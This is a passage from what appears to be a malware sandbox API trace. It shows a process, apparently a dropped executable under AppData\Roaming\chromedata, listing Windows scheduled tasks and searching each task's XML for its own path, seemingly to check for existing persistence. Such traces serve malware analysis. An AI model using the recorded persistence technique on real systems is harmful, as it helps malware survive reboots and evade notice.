<UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{7CCA6768-8373-4D28-8876-83E8B4E3A969}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.635] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SystemDataProviders</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{7CCA6768-8373-4D28-8876-83E8B4E3A969}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.635] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.635] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.635] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec8) returned 0x0
	[0073.636] ITaskFolderCollection:get_Count (in: This=0x55fec8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.636] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.636] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.636] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1f, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.636] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fef0) returned 0x0
	[0073.636] IRegisteredTaskCollection:get_Count (in: This=0x55fef0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.636] IRegisteredTaskCollection:get_Item (in: This=0x55fef0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1060) returned 0x0
	[0073.636] IRegisteredTask:get_Name (in: This=0x22c1060, pName=0x128e3c | out: pName=0x128e3c*="SvcRestartTask") returned 0x0
	[0073.636] IRegisteredTask:get_Xml (in: This=0x22c1060, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\sppc.dll,-200)</Author>\r\n    <Description>$(@%systemroot%\\system32\\sppc.dll,-201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>start sppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.637] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\sppc.dll,-200)</Author>\r\n    <Description>$(@%systemroot%\\system32\\sppc.dll,-201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>start sppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.637] IUnknown:Release (This=0x22c1060) returned 0x0
	[0073.637] IUnknown:Release (This=0x55fef0) returned 0x0
	[0073.637] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fef0) returned 0x0
	[0073.638] ITaskFolderCollection:get_Count (in: This=0x55fef0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.638] IUnknown:Release (This=0x55fef0) returned 0x0
	[0073.638] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.638] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x20, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.638] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed0) returned 0x0
	[0073.638] IRegisteredTaskCollection:get_Count (in: This=0x55fed0, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0073.638] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.638] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed0) returned 0x0
	[0073.639] ITaskFolderCollection:get_Count (in: This=0x55fed0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.639] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.639] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.639] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x21, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.639] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe88) returned 0x0
	[0073.639] IRegisteredTaskCollection:get_Count (in: This=0x55fe88, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.639] IRegisteredTaskCollection:get_Item (in: This=0x55fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff80) returned 0x0
	[0073.639] IRegisteredTask:get_Name (in: This=0x55ff80, pName=0x128e3c | out: pName=0x128e3c*="SR") returned 0x0
	[0073.639] IRegisteredTask:get_Xml (in: This=0x55ff80, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\srrstr.dll,-320)</Source>\r\n    <Author>$(@%systemroot%\\system32\\srrstr.dll,-321)</Author>\r\n    <Description>$(@%systemroot%\\system32\\srrstr.dll,-322)</Description>\r\n    <URI>Microsoft\\Windows\\SystemRestore\\SR</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"SRCalendarTrigger\">\r\n      <StartBoundary>2005-06-14T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <BootTrigger id=\"SRBootTrigger\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d srrstr.dll,ExecuteScheduledSPPCreation</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.640] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\srrstr.dll,-320)</Source>\r\n    <Author>$(@%systemroot%\\system32\\srrstr.dll,-321)</Author>\r\n    <Description>$(@%systemroot%\\system32\\srrstr.dll,-322)</Description>\r\n    <URI>Microsoft\\Windows\\SystemRestore\\SR</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"SRCalendarTrigger\">\r\n      <StartBoundary>2005-06-14T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <BootTrigger id=\"SRBootTrigger\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d srrstr.dll,ExecuteScheduledSPPCreation</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.640] IUnknown:Release (This=0x55ff80) returned 0x0
	[0073.640] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.640] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe88) returned 0x0
	[0073.640] ITaskFolderCollection:get_Count (in: This=0x55fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.640] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.640] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.641] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x22, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.641] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed0) returned 0x0
	[0073.641] IRegisteredTaskCollection:get_Count (in: This=0x55fed0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.641] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c2048) returned 0x0
	[0073.641] IRegisteredTask:get_Name (in: This=0x22c2048, pName=0x128e3c | out: pName=0x128e3c*="Interactive") returned 0x0
	[0073.641] IRegisteredTask:get_Xml (in: This=0x22c2048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\wdc.dll,-10041)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\wdc.dll,-10042)</Source>\r\n    <URI>Microsoft\\Windows\\Task Manager\\Interactive</URI>\r\n    <Description>$(@%systemroot%\\system32\\wdc.dll,-10043)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>5</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{855fec53-d2e4-4999-9e87-3414e9cf0ff4}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.642] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\wdc.dll,-10041)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\wdc.dll,-10042)</Source>\r\n    <URI>Microsoft\\Windows\\Task Manager\\Interactive</URI>\r\n    <Description>$(@%systemroot%\\system32\\wdc.dll,-10043)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>5</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{855fec53-d2e4-4999-9e87-3414e9cf0ff4}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.642] IUnknown:Release (This=0x22c2048) returned 0x0
	[0073.642] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.642] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed0) returned 0x0
	[0073.642] ITaskFolderCollection:get_Count (in: This=0x55fed0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.642] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.642] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.642] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x23, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.642] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec8) returned 0x0
	[0073.643] IRegisteredTaskCollection:get_Count (in: This=0x55fec8, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.643] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c2048) returned 0x0
	[0073.643] IRegisteredTask:get_Name (in: This=0x22c2048, pName=0x128e3c | out: pName=0x128e3c*="IpAddressConflict1") returned 0x0
	[0073.643] IRegisteredTask:get_Xml (in: This=0x22c2048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict1</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"9f81d7ff-8026-44de-94b1-14321e8b9641\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4198]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.644] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict1</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"9f81d7ff-8026-44de-94b1-14321e8b9641\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4198]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    